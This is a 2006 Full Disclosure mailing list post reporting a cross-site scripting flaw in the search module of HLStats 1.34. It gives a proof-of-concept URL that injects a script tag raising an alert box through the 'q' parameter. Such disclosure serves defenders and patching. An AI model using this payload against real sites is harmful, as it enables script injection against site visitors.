Full Disclosure mailing list archives

XSS in HLStats 1.34

From: kefka <kefka () kevinbeardsucks com>
Date: Tue, 29 Aug 2006 03:47:29 -0400

Cross-site Scripting Vulnerability in HLStats 1.34

hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22

Search module fails to sanitize quotes.

kefka
kefka () kevinbeardsucks com

Thanks to RSnake

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

XSS in HLStats 1.34 kefka (Aug 29)